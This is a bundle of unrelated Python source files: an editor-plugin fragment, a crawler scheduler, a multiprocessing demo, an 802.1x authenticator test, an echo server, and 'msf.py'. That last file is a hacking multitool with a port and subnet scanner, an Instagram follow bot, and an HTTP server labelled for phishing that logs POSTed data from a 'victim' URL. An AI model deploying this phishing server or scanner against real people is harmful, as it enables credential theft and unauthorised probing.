f = open(cache_file, 'w')
f.write(data)
f.close()
return data
except:
pass
return None
def runcmd( args, input=None ):
try:
if int(sublime.version()) >= 3000 :
p = Popen(args, stdout=PIPE, stderr=PIPE, stdin=PIPE, startupinfo=STARTUP_INFO)
else:
p = Popen([a.encode(sys.getfilesystemencoding()) for a in args], stdout=PIPE, stderr=PIPE, stdin=PIPE, startupinfo=STARTUP_INFO)
if isinstance(input, unicode) :
input = input.encode('utf-8')
out, err = p.communicate(input=input)
return (out.decode('utf-8') if out else '', err.decode('utf-8') if err else '')
except (OSError, ValueError) as e:
err = u'Error while running %s: %s' % (args[0], e)
if int(sublime.version()) >= 3000 :
return ("",err)
else:
return ("", err.decode('utf-8'))
def show_quick_panel(_window, options, done, flags=0, sel_index=0):
sublime.set_timeout(lambda: _window.show_quick_panel(options, done, flags, sel_index), 10)
class runcmd_async(object):
"""
Enables to run subprocess commands in a different thread with TIMEOUT option.
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
if isinstance(command, str):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
""" Run a command then return: (status, output, error). """
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
except:
self.error = traceback.format_exc()
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
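# Example usage of runcmd_async (illustrative; assumes a `haxe` binary on PATH):
#
#   status, out, err = runcmd_async('haxe -version').run(timeout=10)
#   if status == 0:
#       print(out)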
|
msf.py
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
import zlib
import os
import base64
import threading
from multiprocessing import Process
import time
import sys
import pickle
import zipfile
import logging
import socket
import subprocess
import datetime
try:
import requests
except:
    print('installing the requests module, please wait')
print(subprocess.getstatusoutput('pip3 install requests')[1])
print(subprocess.getstatusoutput('pip install requests')[1])
import requests
try:
from instabot import Bot
except:
    print('installing the instabot module, please wait')
print(subprocess.getstatusoutput('pip3 install instabot')[1])
print(subprocess.getstatusoutput('pip install instabot')[1])
from instabot import Bot
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except:
    print('installing the http module, please wait')
print(subprocess.getstatusoutput('pip3 install http')[1])
print(subprocess.getstatusoutput('pip install http')[1])
from http.server import BaseHTTPRequestHandler, HTTPServer
from sys import argv
from socket import gethostbyaddr
__VERSION__ = "1.0"
__AUTOR__ = "\033[0;36m 〇├ℳ⅀៘※⃫៙※ጠതШ┗┛┏┓┗┛DESMON┗┛┏┓┗┛Шതጠ※៙※៘⅀ℳ┤〇\033[1;37m"
ipEstatic = subprocess.getstatusoutput(
"GET http://www.vermiip.es/ | grep 'Tu IP pública es' | cut -d ':' -f2 | cut -d '<' -f1")[1]
print('for help, type the command: help')
def banner():
if sys.platform == 'linux' or sys.platform == 'linux2' or sys.platform == 'mac':
os.system('clear')
elif sys.platform == 'win32':
os.system('cls')
else:
os.system('clear')
print("""
\033[1;31m░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
\033[1;31m░░\033[1;32m░█▄█░█▀▀░▀█▀░█▀▀░█▀▄░█▀█░█▀▄░█▀▀░▀█▀░█▀▀░█▀▄\033[1;31m░░
\033[1;31m░░\033[1;32m░█░█░█▀▀░░█░░█▀▀░█▀▄░█▀▀░█▀▄░█▀▀░░█░░█▀▀░█▀▄\033[1;31m░░
\033[1;31m░░\033[1;32m░▀░▀░▀▀▀░░▀░░▀▀▀░▀░▀░▀░░░▀░▀░▀▀▀░░▀░░▀▀▀░▀░▀\033[1;31m░░
\033[1;31m░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░\033[1;37m"""+"\n"+__AUTOR__)
def MetadataZip(file):
try:
zf = zipfile.ZipFile(str(file), "r")
for info in zf.infolist():
print(info.filename)
print(" Comment: " + str(info.comment))
print(" Modified: " + str(datetime.datetime(*info.date_time)))
print(" System: " + str(info.create_system) +" (0=MS-DOS OS-2, 3=Unix)")
print(" ZIP version: " + str(info.create_version))
print(" Compressed: " + str(info.compress_size) + " bytes")
print(" Uncompressed: " + str(info.file_size) + " bytes")
zf.close()
except FileNotFoundError:
        print('this file does not exist, make sure you typed it correctly.')
def follower(user, contrasena, user_objetivo):
for i in range(0, 101):
mi_bot = Bot()
mi_bot.login(username=str(user), password=str(contrasena))
mi_bot.follow_followers(user_objetivo)
def CodingBase85Text(text):
data = base64.b85encode(text.encode('utf-8'), pad=False)
print('salida:\033[1;32m '+str(data.decode())+"\033[1;37m")
def DecodingBase85Text(text):
data = base64.b85decode(text.encode())
print('salida:\033[1;32m '+str(data)+"\033[1;37m")
def CodingBase85File(text):
data = base64.b85encode(text.encode('utf-8'), pad=False)
file = open("archivo_encriptado85", "w")
file.write(data.decode())
file.close()
def DecodingBase85File(text):
data = base64.b85decode(text.encode('utf-8'))
file = open("archivo_desencriptado85", "w")
file.write(data.decode())
file.close()
def EncriptBinary(text):
file = open(str(text), "r")
file_bin = open('archivo_binario', "wb")
text = file.read()
pickle.dump(str(text), file_bin)
file_bin.close()
file.close()
def DecodingBinary(file):
fichero = open(str(file), "rb")
dataOput = pickle.load(fichero)
fichero.close()
fichero = open("archivo_desencriptado.txt", "w")
fichero.write(str(dataOput))
fichero.close()
print('salida:\033[1;32m '+dataOput+"\033[1;37m")
def YourDataInfo(ipEstatic):
print("\n\n\a\ntu ip estatica o publica es: " + str(ipEstatic))
print("tu sistema operativo(OS) es: " + str(sys.platform))
print("tiempo: " + str(datetime.date.today()))
print('directorio: ' + str(os.getcwd()))
print("nombre del equipo: " + str(socket.gethostname()))
print("tu ip_v4 es: " + str(socket.gethostbyname(socket.gethostname()))+"\n\n\a")
def nmapDemoTcp(host, MiniPort, MaxPort):
    # host = '192.168.1.1'
    # MaxPort = 54  # maximum port to scan
    # MiniPort = 1  # port at which scanning starts
    number = 1  # number of connections created so far
OpenPort = []
esitenNetwork = []
try:
while True:
if MiniPort < MaxPort and 65536 >= MaxPort:
try:
#time.sleep(0.04)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, proto=0, fileno=None)
                    # try to connect to the current port
                    sock.connect((str(host), int(MiniPort)))
                    # report that the connection was established
                    print('connection established, ' + str(host) + ':' +
                          str(MiniPort) + ' open port: ' + str(MiniPort))
sock.close()
OpenPort.append(MiniPort)
number = number + 1
esitenNetwork.append(host+":"+str(MiniPort))
# print(OpenPort)
except ConnectionRefusedError:
                    print('Port ' + str(MiniPort) + ' is not open')
MiniPort = MiniPort + 1
else:
                print('Scan complete')
                print(str(esitenNetwork))
break
except KeyboardInterrupt:
print(str(esitenNetwork))
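# Unlike connect_ex in scannNetwork below, socket.connect raises
# ConnectionRefusedError on a closed port, which is why each probe above sits
# in a try/except. Calling sock.settimeout() before connect would also keep
# filtered ports from stalling the scan on the default timeout.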
def conect(ip):
print('\n\n\n')
url = 'http://' + str(ip) + '/'
p = requests.get(url, stream=True)
    print('HTML content: \n'+str(p.content))
print(p.cookies)
print(p.encoding) # returns 'utf-8'
print(p.status_code) # returns 200
print(p.elapsed) # returns datetime.timedelta(0, 1, 666890)
print(p.url) # returns 'https://tutsplus.com/'
print(p.history)
file = open('pagina_web.html', 'w')
file.write(str(p.content))
file.close()
def scannNetwork(IpMinima, IpMaxima):
if int(IpMaxima) == 1:
IpMaxima += 1
def scan(addr, port):
#creates a new socket using the given address family.
socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#setting up the default timeout in seconds for new socket object
socket.setdefaulttimeout(0.1)
#returns 0 if connection succeeds else raises error
result = socket_obj.connect_ex((addr,port)) #address and port in the tuple format
        # closes the object
socket_obj.close()
return result
    # list of ports to scan
    def start():
        try:
            ports=[1, 5, 7, 9, 11, 13, 17, 18, 19, 20, 21, 22, 23, 25, 42, 43, 53, 63, 66, 80, 115, 139, 443, 591, 445, 1080, 1234, 6969, 8080, 8000, 42004] # most commonly used ports to scan.
            existenNetwork=list()
            # loop over every IP in the 192.168.1.* range
for i in range(int(IpMinima),int(IpMaxima)):
addr="192.168.1.{}".format(i)
for port in ports:
result=scan(addr, port)
if result==0:
print(addr, port, "\033[1;32mAbierto\033[1;37m")
existenNetwork.append((str(addr), str(port)))
else:
print(addr, port, "\033[1;31mCerrado\033[1;37m")
            os.system('clear')
            print('\033[1;32mraw response: '+str(existenNetwork)+"\033[1;37m")
except KeyboardInterrupt:
            os.system('clear')
            print('\033[1;32mraw response: '+str(existenNetwork)+"\033[1;37m")
start()
def serverHtpp(hosts, port, data, ipEstatic):
try:
print("\n\n\n\nserver abierto en el host: " + str(hosts) + "\npor el puerto: " + str(port) + "\n\a url para ti: http://" +
str(hosts) + ":" + str(port)+"//\nruta para la vitima: http://"+str(ipEstatic)+":"+str(port)+"/")
print('Servidor iniciado, usa <Ctrl-C> para parar el servidor.\n')
try:
file = open(str(data), "r")
data = file.read()
file.close()
except FileNotFoundError:
            print('could not open the file because it does not exist.')
        print('your file content is: \n'+data)
class S(BaseHTTPRequestHandler):
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
logging.info("Solicitud GET,\nPath: %s\nHeaders:\n%s\n", str(
self.path), str(self.headers))
self._set_response()
self.wfile.write(str(data).format(self.path).encode('utf-8'))
def do_POST(self):
# <--- Gets the size of data
content_length = int(self.headers['Content-Length'])
# <--- Gets the data itself
post_data = self.rfile.read(content_length)
logging.info("solicitud POST,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(
self.path), str(self.headers), post_data.decode('utf-8'))
self._set_response()
self.wfile.write("Solicitud POST para {}".format(
self.path).encode('utf-8'))
try:
def run(hosts, port, server_class=HTTPServer, handler_class=S):
logging.basicConfig(level=logging.INFO)
server_address = (str(hosts), int(port))
httpd = server_class(server_address, handler_class)
                logging.info('Starting HTTP server...\n')
try:
httpd.serve_forever()
except:
httpd.server_close()
logging.info('Stopping httpd...\n')
# server.serve_forever()
except:
            print('server closed.')
        # pass the callable and its args instead of calling run() in place
        hilo1 = threading.Thread(target=run, args=(hosts, port))
        hilo1.daemon = True
        hilo1.start()
banner()
    except KeyboardInterrupt:
        # the HTTP server is already closed inside run(); nothing else to clean up
        banner()
        print("server stopped")
YourDataInfo(ipEstatic)
if __name__ == '__main__':
while True:
banner()
opcion = str(input(">>: "))
if opcion == '1':
            file = str(input('file to extract metadata from: '))
MetadataZip(file)
file = None
elif opcion == '2':
            user = str(input('your instagram account: '))
            contrasena = str(input('your password: '))
            user_objetivo = str(input('user to push 100 followers to: '))
            follower(user, contrasena, user_objetivo)
            user = None
            contrasena = None
            user_objetivo = None
elif opcion == '3':
            text = str(input('text to encode in base85: '))
CodingBase85Text(text)
text = None
elif opcion == '4':
            text = str(input('text to decode from base85: '))
DecodingBase85Text(text)
text = None
elif opcion == '5':
            text = str(input('file to encode in base85: '))
CodingBase85File(text)
text = None
elif opcion == '6':
            text = str(input('file to decode from base85: '))
DecodingBase85File(text)
text = None
elif opcion == '7':
            text = str(input('file to encode in binary: '))
file = open(str(text), 'r')
text = file.read()
file.close()
EncriptBinary(text)
text = None
elif opcion == '8':
            file = str(input('file to decode from binary: '))
DecodingBinary(file)
file = None
elif opcion == '9':
YourDataInfo(ipEstatic)
            print('this is your info')
elif opcion == '10':
            # str(input())
            host = str(input('IP whose ports to scan: '))
            MiniPort = int(input('port to start scanning from: '))
            MaxPort = int(input('maximum port to scan (highest possible 65535): '))
nmapDemoTcp(host, MiniPort, MaxPort)
elif opcion == '11':
            ip = str(input('IP or URL to send a GET request to: '))
conect(ip)
elif opcion == '12':
            IpMinima = str(input('last octet of the IP to start scanning from (for the whole network: 1): '))
            IpMaxima = int(input('last octet of the IP to stop scanning at (for the whole network: 255): '))
scannNetwork(IpMinima, IpMaxima)
elif opcion == '13':
            port = str(input('port to open the server on: '))
            data = str(input('file with html, php, css, or javascript content to serve: '))
serverHtpp('127.0.0.1', port, data, ipEstatic)
data = None
port = None
        elif opcion == 'help' or opcion == '14':
            print("""
            \toptions: usage
            \t
            \t 1 \t extract metadata from .zip files\n
            \t 2 \t instagram followers.\n
            \t 3 \t encode text in base85\n
            \t 4 \t decode text from base85\n
            \t 5 \t encode files in base85\n
            \t 6 \t decode files from base85\n
            \t 7 \t encode files in binary\n
            \t 8 \t decode files from binary\n
            \t 9 \t your information\n
            \t 10\t single-target port scanner\n
            \t 11\t http GET request to an IP or URL (scraping)\n
            \t 12\t host scanner using a single port\n
            \t 13\t http server, for phishing and other uses\n
            \t 14\t help\n
            \t 15\t exit\n
            """)
        elif opcion == '15':
            break
        elif opcion == 'desmon':
            print('please contact me if you had any problem.')
        else:
            print('enter a valid option. :(')
        input('\n\a\nPress Enter, please...')
    #except KeyboardInterrupt:
    #    print('you did something wrong. :(')
|
deploy.py
|
__all__ = ['GeventSchedule']
import threading
import time
import schedule
from BusinessCentralLayer.middleware.redis_io import *
from BusinessCentralLayer.sentinel import noticer
from BusinessLogicLayer.cluster import __task__
from config import REDIS_SECRET_KEY, SINGLE_TASK_CAP, CRAWLER_SEQUENCE, ENABLE_COROUTINE, LAUNCH_INTERVAL, logger
class GeventSchedule(object):
def __init__(self, go: bool = ENABLE_COROUTINE, deploy_cluster=CRAWLER_SEQUENCE, cap=SINGLE_TASK_CAP,
crontab=LAUNCH_INTERVAL):
        # task queue
        self.deploy_cluster = deploy_cluster
        # coroutine acceleration
        self.go = go
        # single-machine collection cap
        self.cap = cap
        # task interval (minutes)
        self.crontab = crontab
        # connect to the cluster
self.rc = RedisClient()
self.rc_len = dict(zip(self.deploy_cluster, [1] * 3))
def push_task(self, task_name: str) -> bool:
"""
@param task_name:
@return:
"""
        # wrong data type for the input parameter
if not isinstance(task_name, str):
logger.error(f'The input type is wrong({task_name})')
return False
        # the input parameter is not in the allowed task set
if task_name not in self.deploy_cluster:
logger.error(f'Spelling error in input({task_name}),Please choose from {self.deploy_cluster}')
return False
try:
            # check whether the buffer queue has reached the single-machine collection cap
            task_name = task_name.lower()
            self.rc_len[f'{task_name}'] = self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}'))
            logger.info(f'[TEST] || Checking the ({task_name}) task queue...')
            # if the cap is reached or exceeded, put the task to sleep
            if self.rc_len[f"{task_name}"] >= self.cap:
                logger.debug(f'[SLEEP] || Task queue is full ({task_name}) ({self.rc_len[f"{task_name}"]}/{self.cap})')
                return True
        finally:
            # run ddt once whether or not the queue is full
            self.ddt(class_=task_name)
        try:
            # run the collection task; self.go decides whether coroutine acceleration is used
            logger.info(f'[RUN] || ({task_name}) collection task started')
            __task__.loads_task(task_name, self.go)
            # check whether the task failed completely, i.e. every collection task for this
            # link type failed -> Abnormal
            if self.rc.__len__(REDIS_SECRET_KEY.format(f'{task_name}')) < self.rc_len[f'{task_name}']:
                logger.error(f'[CRITICAL]Abnormal collection task({task_name})')
            else:
                return True
        except Exception as e:
            # catch unknown errors
            logger.error(f'[ERROR]{self.__class__.__name__}({task_name}) crawler engine panic {e}')
        finally:
            # collection for this single link type is finished
            logger.success('[OVER] || Task finished {}({})'.format(self.__class__.__name__, task_name))
@logger.catch()
def run_check(self, class_: str) -> None:
"""
启动任务:以非部署模式,传递参数
@param class_:
--传入的应是 config 中 crawler seq中的参数,如`v2ray`/`ssr`/`trojan`
--确保操作的原子性,不要一次性传入多个参数,
--正确的做法是通过<协程引擎>的消息队列形式驱动多任务
--或使用for迭代work_seq顺序驱动多任务
@return:
"""
__task__.loads_task(class_, self.go, startup=False, loads_=True)
# self.push_task(class_)
def ddt(self, class_: str = None) -> None:
"""
@param class_: subscribe type `ssr` or `v2ray` or `trojan` ...
@return:
"""
if class_ is None:
for item in self.deploy_cluster:
threading.Thread(target=RedisDataDisasterTolerance().run, args=(item,)).start()
elif isinstance(class_, str) and class_ in self.deploy_cluster:
RedisDataDisasterTolerance().run(class_)
else:
            logger.warning('{}.ddt() got a bad argument; likely cause: wrong type / not in the crawler_seq work queue'.format(self.__class__.__name__))
def run(self) -> None:
# logger.warning('This is a development server. Do not use it in a production deployment.')
try:
for task_name in self.deploy_cluster:
try:
schedule.every(self.crontab['action']).minutes.do(self.push_task, task_name=task_name)
schedule.every(self.crontab['refresh']).minutes.do(self.rc.refresh,
key_name=REDIS_SECRET_KEY.format(task_name))
logger.info(f"start {task_name}/crontab:{self.crontab['action']} minutes")
except schedule.IntervalError:
logger.error('interval set error')
self.crontab['action'] += 5
while True:
schedule.run_pending()
time.sleep(1)
except Exception as err:
logger.exception('Exception occurred ||{}'.format(err))
noticer.send_email(text_body='{}'.format(err), to='self')
except KeyboardInterrupt as err:
logger.stop('Forced stop ||{}'.format(err))
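# Scheduling sketch: run() registers one push_task job and one cache-refresh
# job per task type, then drives them with schedule's polling loop. The shape
# of the pattern (job is a stand-in name):
#
#   schedule.every(10).minutes.do(job)
#   while True:
#       schedule.run_pending()
#       time.sleep(1)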
if __name__ == '__main__':
GeventSchedule().run()
|
net04_sing_dance_queue.py
|
"""Queue"""
'''
@Time : 2018/1/22 4:58 PM
@Author : scrappy_zhang
@File : net04_sing_dance_queue.py
'''
import multiprocessing
import time
def sing(name, sing_name):
for i in range(5):
        print(name, 'is singing %s, round %d' % (sing_name, i))
        time.sleep(1)  # rest for 1 second
while True:
if not q.empty():
            value = q.get()  # read data from the queue
            print('Jam received a', value)
else:
break
def dance(**kwargs):
dancer = kwargs['dancer']
    q.put('flower')  # write a flower into the queue
    print('Jackson handed Jam a flower')
    for i in range(5):
        print('%s is dancing, round %d' % (dancer, i))
        time.sleep(1)  # rest for 1 second
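# Note: both child processes can reach the module-level queue q because this
# demo relies on fork-style process creation (the default on Linux). Under the
# 'spawn' start method the queue would have to be passed explicitly, e.g. by
# giving sing/dance a queue parameter (hypothetical change, not in the demo).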
if __name__ == '__main__':
singer = 'Jam'
sing_name = '不露声色'
    q = multiprocessing.Queue()  # create the queue
    p1 = multiprocessing.Process(target=sing, args=(singer, sing_name))  # create the singing process
    p2 = multiprocessing.Process(target=dance, kwargs={'dancer': 'Jackson'})  # create the dancing process
    p1.start()  # start the sing process
    p2.start()  # start the dance process
|
authenticator.py
|
"""Authenticator module"""
from __future__ import absolute_import
from eap_module import EapModule
from heartbeat_scheduler import HeartbeatScheduler
from radius_module import RadiusModule, RadiusPacketInfo, RadiusSocketInfo, port_id_to_int
from message_parser import IdentityMessage, FailureMessage
import json
import sys
import threading
import time
import utils
class AuthStateMachine:
"""Authenticator state machine"""
START = "start"
SUPPLICANT = "Talk to Supplicant"
RADIUS = "Talk to RADIUS server"
FAIL = "Test Failed"
SUCCESS = "Test Succeeded"
def __init__(self, src_mac, auth_mac, idle_time, retry_count,
eap_send_callback, radius_send_callback, auth_callback):
self.state = None
self._state_lock = threading.Lock()
self._timer_lock = threading.RLock()
self.logger = utils.get_logger('AuthSM')
self.src_mac = src_mac
self.eap_send_callback = eap_send_callback
self.radius_send_callback = radius_send_callback
self.auth_callback = auth_callback
self.identity = None
self.authentication_mac = auth_mac
self.radius_state = None
self.radius_access_reject = None
self._idle_time = idle_time
self._max_retry_count = retry_count
self._current_timeout = None
self._retry_func = None
self._retry_args = None
self._current_retries = None
def initialize(self):
"""Initialize state machine"""
self._state_transition(self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
def _state_transition(self, target, expected=None):
with self._state_lock:
if expected is not None:
message = 'state was %s expected %s' % (self.state, expected)
assert self.state == expected, message
self.logger.debug('Transition for %s: %s -> %s', self.src_mac, self.state, target)
self.state = target
def received_eapol_start(self):
"""Received EAPOL start on EAP socket"""
self._state_transition(self.SUPPLICANT, self.START)
self._set_timeout(self._idle_time)
self._set_retry_actions(retry_func=self.eap_send_callback, retry_args=[self.src_mac])
self.eap_send_callback(self.src_mac)
def received_eap_request(self, eap_message):
"""Received EAP request"""
if isinstance(eap_message, IdentityMessage) and not self.identity:
self.identity = eap_message.identity
self._state_transition(self.RADIUS, self.SUPPLICANT)
port_id = port_id_to_int(self.authentication_mac)
radius_packet_info = RadiusPacketInfo(
eap_message, self.src_mac, self.identity, self.radius_state, port_id)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.radius_send_callback, retry_args=[radius_packet_info])
self.radius_send_callback(radius_packet_info)
def received_radius_response(self, payload, radius_state, packet_type):
"""Received RADIUS access channel"""
self.radius_state = radius_state
self.logger.info('Received %s response %s' % (self.src_mac, packet_type))
if packet_type == 'RadiusAccessReject':
self.radius_access_reject = True
self._state_transition(self.FAIL, self.RADIUS)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
else:
eap_message = payload
if packet_type == 'RadiusAccessAccept':
self._state_transition(self.SUCCESS, self.RADIUS)
self.auth_callback(self.src_mac, True)
else:
self._state_transition(self.SUPPLICANT, self.RADIUS)
self._set_timeout(self._idle_time)
self._set_retry_actions(
retry_func=self.eap_send_callback, retry_args=[self.src_mac, eap_message])
self.eap_send_callback(self.src_mac, eap_message)
def _set_timeout(self, timeout_time=None, clear=False):
with self._timer_lock:
if clear:
self._current_timeout = None
else:
self._current_timeout = time.time() + timeout_time
def _set_retry_actions(self, retry_func=None, retry_args=None):
self._retry_func = retry_func
self._retry_args = list(retry_args)
self._current_retries = 0
def _clear_retry_actions(self):
self._retry_func = None
self._retry_args = None
self._current_retries = 0
def handle_timer(self):
"""Handle timer and check if timeout is exceeded"""
with self._timer_lock:
if self._current_timeout:
if time.time() > self._current_timeout:
if self._current_retries < self._max_retry_count:
self._current_retries += 1
self._set_timeout(self._idle_time)
self._retry_func(*self._retry_args)
else:
self._handle_timeout()
def _handle_timeout(self):
self._state_transition(self.FAIL)
self._set_timeout(clear=True)
eap_message = FailureMessage(self.src_mac, 255)
self.auth_callback(self.src_mac, False)
self.eap_send_callback(self.src_mac, eap_message)
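# State machine summary: START --EAPOL-Start--> SUPPLICANT --EAP request-->
# RADIUS; from RADIUS, Access-Accept moves to SUCCESS, Access-Reject to FAIL,
# and any other response (e.g. Access-Challenge) loops back to SUPPLICANT.
# A timer retries the last send up to _max_retry_count times before forcing FAIL.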
class Authenticator:
"""Authenticator to manage Authentication flow"""
HEARTBEAT_INTERVAL = 3
IDLE_TIME = 9
RETRY_COUNT = 3
RADIUS_PORT = 1812
EAPOL_IDLE_TIME = 180
def __init__(self, config_file):
self.state_machines = {}
self.results = {}
self.radius_access_reject = {}
self.eap_module = None
self.radius_module = None
self.logger = utils.get_logger('Authenticator')
self._config_file = config_file
self._threads = []
self._radius_socket_info = None
self._radius_secret = None
self._radius_id = None
self._interface = None
self._idle_time = None
self._max_retry_count = None
self._current_timeout = None
self._debug = False
self._setup()
def _load_config(self):
with open(self._config_file, 'r') as file_stream:
full_config = json.load(file_stream)
config = full_config.get('modules').get('dot1x')
self._debug = config.get('debug')
if self._debug:
utils.enable_debug_logs(self.logger)
self.logger.debug('Loaded config from %s:\n %s', self._config_file, config)
self._interface = config.get('interface', utils.get_interface_name())
radius_config = config.get('radius_server', {})
radius_socket_info = radius_config.get('radius_socket_info', {})
listen_ip = radius_socket_info.get('listen_ip', utils.get_interface_ip(self._interface))
listen_port = radius_socket_info.get('listen_port', 0)
remote_ip = radius_socket_info.get('remote_ip', '127.0.0.1')
remote_port = radius_socket_info.get('remote_port', self.RADIUS_PORT)
self._radius_socket_info = RadiusSocketInfo(listen_ip, listen_port, remote_ip, remote_port)
self._radius_secret = radius_config.get('secret', 'SECRET')
self._radius_id = radius_config.get('id', utils.get_interface_mac(self._interface))
def _setup(self):
self._load_config()
self.radius_module = RadiusModule(
self._radius_socket_info, self._radius_secret,
self._radius_id, self.received_radius_response)
self.eap_module = EapModule(self._interface, self.received_eap_request)
if self._debug:
utils.enable_debug_logs(self.radius_module.logger)
utils.enable_debug_logs(self.eap_module.logger)
# TODO: Take value from config and then revert to default
interval = self.HEARTBEAT_INTERVAL
# TODO: Take value from config and then revert to default
self._idle_time = self.IDLE_TIME
self._max_retry_count = self.RETRY_COUNT
self.sm_timer = HeartbeatScheduler(interval)
self.sm_timer.add_callback(self.handle_sm_timeout)
self._current_timeout = time.time() + self.EAPOL_IDLE_TIME
def start_threads(self):
self.logger.info('Starting SM timer')
self.sm_timer.start()
self.logger.info('Listening for EAP and RADIUS.')
def build_thread(method):
self._threads.append(threading.Thread(target=method))
build_thread(self.radius_module.receive_radius_messages)
build_thread(self.radius_module.send_radius_messages)
build_thread(self.eap_module.receive_eap_messages)
build_thread(self.eap_module.send_eap_messages)
for thread in self._threads:
thread.start()
for thread in self._threads:
thread.join()
self.logger.info('Done listening for EAP and RADIUS packets.')
def _end_authentication(self):
self.logger.info('Stopping timer')
if self.sm_timer:
self.sm_timer.stop()
self.logger.info('Shutting down modules.')
self.radius_module.shut_down_module()
self.eap_module.shut_down_module()
def received_eap_request(self, src_mac, eap_message, is_eapol):
if is_eapol:
if not (src_mac in self.state_machines or src_mac in self.results):
self.logger.info('Starting authentication for %s' % (src_mac))
auth_mac = self.eap_module.get_auth_mac()
state_machine = AuthStateMachine(
src_mac, auth_mac,
self._idle_time, self._max_retry_count,
self.send_eap_response, self.send_radius_request,
self.process_test_result)
state_machine.initialize()
self.state_machines[src_mac] = state_machine
state_machine.received_eapol_start()
else:
self.logger.warning(
'Authentication for %s is in progress or has completed' % (src_mac))
        else:
            state_machine = self.state_machines.get(src_mac)
            if not state_machine:
                self.logger.warning('Received EAP request for unknown %s; ignoring' % (src_mac))
                return
            state_machine.received_eap_request(eap_message)
def received_radius_response(self, src_mac, radius_attributes, packet_type):
eap_message = radius_attributes.eap_message
radius_state = radius_attributes.state
state_machine = self.state_machines[src_mac]
state_machine.received_radius_response(eap_message, radius_state, packet_type)
def send_eap_response(self, src_mac, message=None):
if not message:
self.eap_module.send_eapol_response(src_mac)
else:
self.eap_module.send_eap_message(src_mac, message)
def send_radius_request(self, radius_packet_info):
self.radius_module.send_radius_packet(radius_packet_info)
def process_test_result(self, src_mac, is_success):
if is_success:
self.logger.info('Authentication successful for %s' % (src_mac))
else:
if src_mac:
self.logger.info('Authentication failed for %s' % (src_mac))
else:
self.logger.info('Authentication failed. Received no EAPOL packets.')
if src_mac:
self.results[src_mac] = is_success
if self.state_machines[src_mac].radius_access_reject:
self.radius_access_reject[src_mac] = True
self.state_machines.pop(src_mac)
# TODO: We currently finalize results as soon as we get a result for a src_mac.
# Needs to be changed if we support multiple devices.
self._end_authentication()
def run_authentication_test(self):
self.start_threads()
result_str = ""
test_result = ""
self.logger.info('Auth results %s' % self.results)
self.logger.info('Auth rejects %s' % self.radius_access_reject)
if not self.results:
result_str = "Authentication failed. No EAPOL messages received."
            result_str = result_str + " Check that 802.1x is enabled."
test_result = "skip"
else:
test_result = "pass"
for src_mac, is_success in self.results.items():
self.logger.info('Auth check %s %s %s' % (
src_mac, is_success, src_mac in self.radius_access_reject))
additional = ''
if is_success:
result = 'succeeded'
else:
result = 'failed'
test_result = "fail"
if src_mac in self.radius_access_reject:
additional = ' Incorrect credentials provided.'
else:
additional = ' Error encountered.'
result_str += "Authentication %s.%s" % (result, additional)
self.logger.info('Auth result %s %s' % (test_result, result_str))
return result_str, test_result
def handle_sm_timeout(self):
if not self.state_machines and self._current_timeout:
if time.time() > self._current_timeout:
self.process_test_result(None, False)
else:
# Convert to list to prevent concurrent modification issues.
for state_machine in list(self.state_machines.values()):
state_machine.handle_timer()
def main():
    # __init__ requires a config file path; taking it from argv is an assumption
    # (and presumes sys is imported at the top of this file).
    authenticator = Authenticator(sys.argv[1])
print(authenticator.run_authentication_test())
if __name__ == '__main__':
main()
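# Example config file shape consumed by _load_config() above (illustrative
# sketch; key names come from the getters in this file, values are made up):
# {
#   "modules": {
#     "dot1x": {
#       "debug": false,
#       "interface": "eth0",
#       "radius_server": {
#         "radius_socket_info": {
#           "listen_ip": "10.0.0.2", "listen_port": 0,
#           "remote_ip": "127.0.0.1", "remote_port": 1812
#         },
#         "secret": "SECRET",
#         "id": "02:42:ac:11:00:02"
#       }
#     }
#   }
# }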
|
multi_echo_server.py
|
#!/usr/bin/env python3
import socket
import time
from multiprocessing import Process
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
def main():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(2)
while True:
conn, addr = s.accept()
p = Process(target=handle_echo, args=(addr, conn))
p.daemon = True
            p.start()
            conn.close()  # close the parent's copy; the child process owns the connection now
            print("Started process ", p)
def handle_echo(addr, conn):
print("Connected by", addr)
full_data = b""
while True:
data = conn.recv(BUFFER_SIZE)
if not data: break
full_data += data
time.sleep(0.5)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
if __name__ == "__main__":
main()
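# Minimal client sketch for exercising this server (illustrative only):
#
#   import socket
#   with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as c:
#       c.connect(("127.0.0.1", PORT))
#       c.sendall(b"hello")
#       c.shutdown(socket.SHUT_WR)     # half-close so the server's recv() returns b""
#       print(c.recv(BUFFER_SIZE))     # -> b"hello" (the full payload echoed back)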
|
__init__.py
|
#!/bin/python
# -*- coding: utf-8 -*-
# Kage personal stuff
#
from __future__ import print_function
import os
import re
import sys
import ast
import ssl
import stat
import time
import uuid
import smtplib
import tarfile
import zipfile
import random
import struct
import string
